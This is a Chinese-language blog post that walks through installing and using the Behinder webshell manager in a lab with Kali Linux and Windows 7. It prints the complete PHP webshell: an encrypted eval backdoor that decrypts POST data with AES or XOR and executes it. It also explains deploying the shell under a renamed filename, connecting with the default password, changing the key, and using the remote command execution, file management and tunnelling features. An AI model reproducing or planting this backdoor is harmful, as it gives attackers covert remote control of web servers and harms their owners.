PJzhang:冰蝎webshell管理工具试用

猫宁~~~

操作系统kali linux 

https://github.com/rebeyond/Behinder
https://github.com/rebeyond/Behinder/releases
https://github.com/rebeyond/Behinder/releases/download/Behinder_v3.0_Beta_6/Behinder_v3.0_Beta_6_linux.zip

打开冰蝎客户端
java -jar /root/Desktop/Behinder_v3.0_Beta_6_linux/Behinder_v3.0_Beta6_linux.jar

kali linux系统IP 10.108.18.98

windows 7系统IP 10.108.18.99

windows 7采用phpstudy启用wamp

使用server文件夹中的shell.php

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond
    $_SESSION['k']=$key;
    $post=file_get_contents("php://input");
    if(!extension_loaded('openssl'))
    {
        $t="base64_"."decode";
        $post=$t($post."");
        
        for($i=0;$i<strlen($post);$i++) {
                 $post[$i] = $post[$i]^$key[$i+1&15]; 
                }
    }
    else
    {
        $post=openssl_decrypt($post, "AES128", $key);
    }
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
    class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

shell.php在C:\phpstudy_pro\WWW下重命名为xiaozhupeiqi.php

http://10.108.18.99/xiaozhupeiqi.php

点击空白，右键新增，输入URL和默认密码rebeyond

连接成功

基本信息是一个phpinfo，还有命令执行，虚拟终端，文件管理，其中内网穿透功能可以试试。

rebeyond进行md5加密为e45e329feb5d925ba3f549b17b4b3dde

前16位是45e329feb5d925b

如果想要修改密码，只需要将自定义密码md5加密之后的前16位替换一下就OK

例如xiaozhupeiqi，md5加密，620157faf8ab159f0bc80ad0a8f42b68，前16位620157faf8ab159f

可以连接成功

md5加解密可以用这个网站

https://www.cmd5.com/hash.aspx

代理设置127.0.0.1 8081 http，burpsuite proxy的options对应设置，可以通过测试抓取流量

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36

除了支持php木马，还支持asp，aspx，jsp木马。

over~~~